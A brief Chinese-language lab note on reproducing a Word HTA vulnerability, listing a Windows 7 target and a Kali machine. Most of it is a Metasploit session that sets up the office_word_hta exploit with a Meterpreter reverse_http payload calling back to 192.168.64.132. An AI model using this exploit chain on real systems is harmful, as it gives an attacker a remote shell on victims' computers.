Office 漏洞复现

测试环境:

靶机:office word 2017 (12.0.6612.1000) windos 7 Sp1

机器:kali 2.0 msfconsole

 

msf exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > SRVHOST 192.168.64.132
msf exploit(office_word_hta) > set SRVHOST 192.168.64.132
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(office_word_hta) > set lhost 192.168.64.132
lhost => 192.168.64.132
msf exploit(office_word_hta) > exploit